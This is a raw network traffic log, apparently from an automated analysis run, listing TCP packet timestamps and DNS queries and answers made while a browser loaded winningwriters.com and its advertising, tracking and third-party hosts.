                                                                                                                                                                                            Nov 18, 2024 21:01:19.274504900 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274527073 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274528027 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274544001 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274559975 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274578094 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274594069 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274616003 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274621010 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274637938 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274653912 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274653912 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274671078 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274674892 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.274715900 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275582075 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275600910 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275616884 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275635004 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275634050 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275651932 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275655985 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275670052 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275686026 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275702953 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275702000 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275719881 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275727034 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275737047 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275754929 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275770903 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275775909 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275788069 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275805950 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275815964 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275821924 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275837898 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.275876999 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276451111 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276475906 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276492119 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276509047 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276525021 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276529074 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276541948 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276556015 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276560068 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276576996 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276593924 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276601076 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276611090 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276623964 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276628971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276647091 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276664019 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276681900 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276684999 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276721001 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.276737928 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277288914 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277307034 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277323961 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277342081 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277358055 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277358055 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277375937 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277391911 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277396917 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277443886 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277647972 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277664900 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277683020 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277698994 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277733088 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277790070 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277806997 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277822971 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277841091 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277857065 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277874947 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277875900 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277892113 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277909040 CET8049940193.188.22.73192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:01:19.277914047 CET4994080192.168.2.16193.188.22.73
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Nov 18, 2024 20:59:59.828332901 CET192.168.2.161.1.1.10xd4d5Standard query (0)winningwriters.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 20:59:59.832822084 CET192.168.2.161.1.1.10x3776Standard query (0)winningwriters.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:00.939544916 CET192.168.2.161.1.1.10x56Standard query (0)winningwriters.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:00.939691067 CET192.168.2.161.1.1.10x531fStandard query (0)winningwriters.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:03.749327898 CET192.168.2.161.1.1.10x2282Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:03.749531984 CET192.168.2.161.1.1.10xe15bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:04.377577066 CET192.168.2.161.1.1.10x122dStandard query (0)winningwriters.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:04.377707005 CET192.168.2.161.1.1.10xbdc9Standard query (0)winningwriters.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.718206882 CET192.168.2.161.1.1.10x4c53Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.718467951 CET192.168.2.161.1.1.10xfd61Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.722420931 CET192.168.2.161.1.1.10x893bStandard query (0)cta.berlmember.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.722554922 CET192.168.2.161.1.1.10xe407Standard query (0)cta.berlmember.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.740011930 CET192.168.2.161.1.1.10xaa86Standard query (0)scontent-ord5-1.cdninstagram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.740159035 CET192.168.2.161.1.1.10xe323Standard query (0)scontent-ord5-1.cdninstagram.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.807817936 CET192.168.2.161.1.1.10xe2cStandard query (0)s7.addthis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.808340073 CET192.168.2.161.1.1.10x4c46Standard query (0)s7.addthis.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.876553059 CET192.168.2.161.1.1.10x3df6Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.876691103 CET192.168.2.161.1.1.10x38ceStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.598476887 CET192.168.2.161.1.1.10x6bb2Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.598613024 CET192.168.2.161.1.1.10x6fa0Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.902926922 CET192.168.2.161.1.1.10x1454Standard query (0)scontent-ord5-1.cdninstagram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.903151989 CET192.168.2.161.1.1.10x7bacStandard query (0)scontent-ord5-1.cdninstagram.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.441375971 CET192.168.2.161.1.1.10xf0acStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.441525936 CET192.168.2.161.1.1.10xbe00Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.465058088 CET192.168.2.161.1.1.10xaf6aStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.465305090 CET192.168.2.161.1.1.10xfbd5Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.480706930 CET192.168.2.161.1.1.10x65a0Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.480827093 CET192.168.2.161.1.1.10x343bStandard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.516448975 CET192.168.2.161.1.1.10xd759Standard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.516604900 CET192.168.2.161.1.1.10x25adStandard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.520529985 CET192.168.2.161.1.1.10x8bc0Standard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.520699024 CET192.168.2.161.1.1.10xe558Standard query (0)static.ads-twitter.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.609513998 CET192.168.2.161.1.1.10xac26Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.609708071 CET192.168.2.161.1.1.10xd60Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.786159039 CET192.168.2.161.1.1.10x80eStandard query (0)cta.berlmember.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.786355019 CET192.168.2.161.1.1.10x98a9Standard query (0)cta.berlmember.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.544164896 CET192.168.2.161.1.1.10xa371Standard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.544320107 CET192.168.2.161.1.1.10x12a3Standard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.548850060 CET192.168.2.161.1.1.10x4e41Standard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.549042940 CET192.168.2.161.1.1.10xc7ddStandard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.679410934 CET192.168.2.161.1.1.10xac50Standard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.679653883 CET192.168.2.161.1.1.10x54abStandard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.721757889 CET192.168.2.161.1.1.10xde3bStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.721946955 CET192.168.2.161.1.1.10xdebeStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.796513081 CET192.168.2.161.1.1.10x13eStandard query (0)cta.berlmember.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.796773911 CET192.168.2.161.1.1.10xcedeStandard query (0)cta.berlmember.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.928580999 CET192.168.2.161.1.1.10xfdccStandard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:08.928726912 CET192.168.2.161.1.1.10x72bfStandard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.009466887 CET192.168.2.161.1.1.10x8e56Standard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.009614944 CET192.168.2.161.1.1.10x29e1Standard query (0)static.ads-twitter.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.048127890 CET192.168.2.161.1.1.10xb554Standard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.048424006 CET192.168.2.161.1.1.10x7680Standard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.171890974 CET192.168.2.161.1.1.10x17faStandard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.172045946 CET192.168.2.161.1.1.10x7098Standard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.343658924 CET192.168.2.161.1.1.10xcda0Standard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.343792915 CET192.168.2.161.1.1.10x626bStandard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.359366894 CET192.168.2.161.1.1.10x9aeeStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.359524965 CET192.168.2.161.1.1.10xa680Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.432154894 CET192.168.2.161.1.1.10xa273Standard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.432307005 CET192.168.2.161.1.1.10xcdf2Standard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.455683947 CET192.168.2.161.1.1.10x4a31Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.456003904 CET192.168.2.161.1.1.10x5520Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.878688097 CET192.168.2.161.1.1.10x3a61Standard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.878875971 CET192.168.2.161.1.1.10xa1c9Standard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.924982071 CET192.168.2.161.1.1.10x3c4fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:09.925122976 CET192.168.2.161.1.1.10x3b1cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.058686972 CET192.168.2.161.1.1.10x4640Standard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.058824062 CET192.168.2.161.1.1.10x3559Standard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.097058058 CET192.168.2.161.1.1.10xfc23Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.097234964 CET192.168.2.161.1.1.10xae46Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.233104944 CET192.168.2.161.1.1.10x3f3bStandard query (0)w3-reporting-nel.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.235246897 CET192.168.2.161.1.1.10x1a37Standard query (0)w3-reporting-nel.reddit.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.359443903 CET192.168.2.161.1.1.10xea91Standard query (0)premiumserviceads.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.359595060 CET192.168.2.161.1.1.10xbd2bStandard query (0)premiumserviceads.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.471616030 CET192.168.2.161.1.1.10x3e01Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:10.471774101 CET192.168.2.161.1.1.10x4028Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:11.769963980 CET192.168.2.161.1.1.10xd24aStandard query (0)bcbshieldn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:11.770100117 CET192.168.2.161.1.1.10xdf3eStandard query (0)bcbshieldn.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:13.994992018 CET192.168.2.161.1.1.10x64edStandard query (0)bcbshieldn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:13.995277882 CET192.168.2.161.1.1.10xfd8Standard query (0)bcbshieldn.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:14.191807032 CET192.168.2.161.1.1.10x6d15Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:14.191976070 CET192.168.2.161.1.1.10x42c0Standard query (0)google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:11.014902115 CET192.168.2.161.1.1.10xb6a9Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:11.015410900 CET192.168.2.161.1.1.10x534fStandard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:11.022968054 CET192.168.2.161.1.1.10x5095Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:11.023133039 CET192.168.2.161.1.1.10x27b2Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:31.220232964 CET192.168.2.161.1.1.10x108fStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:31.220438004 CET192.168.2.161.1.1.10xc047Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:32.356357098 CET192.168.2.161.1.1.10x1427Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:01:32.356436968 CET192.168.2.161.1.1.10xba4aStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Nov 18, 2024 21:00:00.207721949 CET1.1.1.1192.168.2.160xd4d5No error (0)winningwriters.com66.33.207.42A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:01.172280073 CET1.1.1.1192.168.2.160x56No error (0)winningwriters.com66.33.207.42A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:03.756670952 CET1.1.1.1192.168.2.160x2282No error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:03.756912947 CET1.1.1.1192.168.2.160xe15bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:04.498919010 CET1.1.1.1192.168.2.160x122dNo error (0)winningwriters.com66.33.207.42A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.727372885 CET1.1.1.1192.168.2.160x4c53No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.727372885 CET1.1.1.1192.168.2.160x4c53No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.727372885 CET1.1.1.1192.168.2.160x4c53No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.727372885 CET1.1.1.1192.168.2.160x4c53No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.746990919 CET1.1.1.1192.168.2.160xaa86No error (0)scontent-ord5-1.cdninstagram.com157.240.249.63A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.747807980 CET1.1.1.1192.168.2.160xe323No error (0)scontent-ord5-1.cdninstagram.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.816869020 CET1.1.1.1192.168.2.160xe2cNo error (0)s7.addthis.coms8.addthis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.816869020 CET1.1.1.1192.168.2.160xe2cNo error (0)s8.addthis.comds-s7.addthis.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.816989899 CET1.1.1.1192.168.2.160x4c46No error (0)s7.addthis.coms8.addthis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.816989899 CET1.1.1.1192.168.2.160x4c46No error (0)s8.addthis.comds-s7.addthis.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.865864992 CET1.1.1.1192.168.2.160x893bNo error (0)cta.berlmember.com103.52.144.214A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.883670092 CET1.1.1.1192.168.2.160x3df6No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.883670092 CET1.1.1.1192.168.2.160x3df6No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.884074926 CET1.1.1.1192.168.2.160x38ceNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.884074926 CET1.1.1.1192.168.2.160x38ceNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:05.884074926 CET1.1.1.1192.168.2.160x38ceNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.606009960 CET1.1.1.1192.168.2.160x6bb2No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.606009960 CET1.1.1.1192.168.2.160x6bb2No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.606009960 CET1.1.1.1192.168.2.160x6bb2No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.606009960 CET1.1.1.1192.168.2.160x6bb2No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.910372019 CET1.1.1.1192.168.2.160x1454No error (0)scontent-ord5-1.cdninstagram.com157.240.249.63A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:06.911457062 CET1.1.1.1192.168.2.160x7bacNo error (0)scontent-ord5-1.cdninstagram.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.448223114 CET1.1.1.1192.168.2.160xf0acNo error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.448257923 CET1.1.1.1192.168.2.160xbe00No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.472172022 CET1.1.1.1192.168.2.160xfbd5No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.472321033 CET1.1.1.1192.168.2.160xaf6aNo error (0)googleads.g.doubleclick.net142.250.186.162A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.487776995 CET1.1.1.1192.168.2.160x65a0No error (0)td.doubleclick.net142.250.185.130A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.524063110 CET1.1.1.1192.168.2.160xd759No error (0)www.redditstatic.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.524063110 CET1.1.1.1192.168.2.160xd759No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.524063110 CET1.1.1.1192.168.2.160xd759No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                            Nov 18, 2024 21:00:07.524063110 CET1.1.1.1192.168.2.160xd759No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
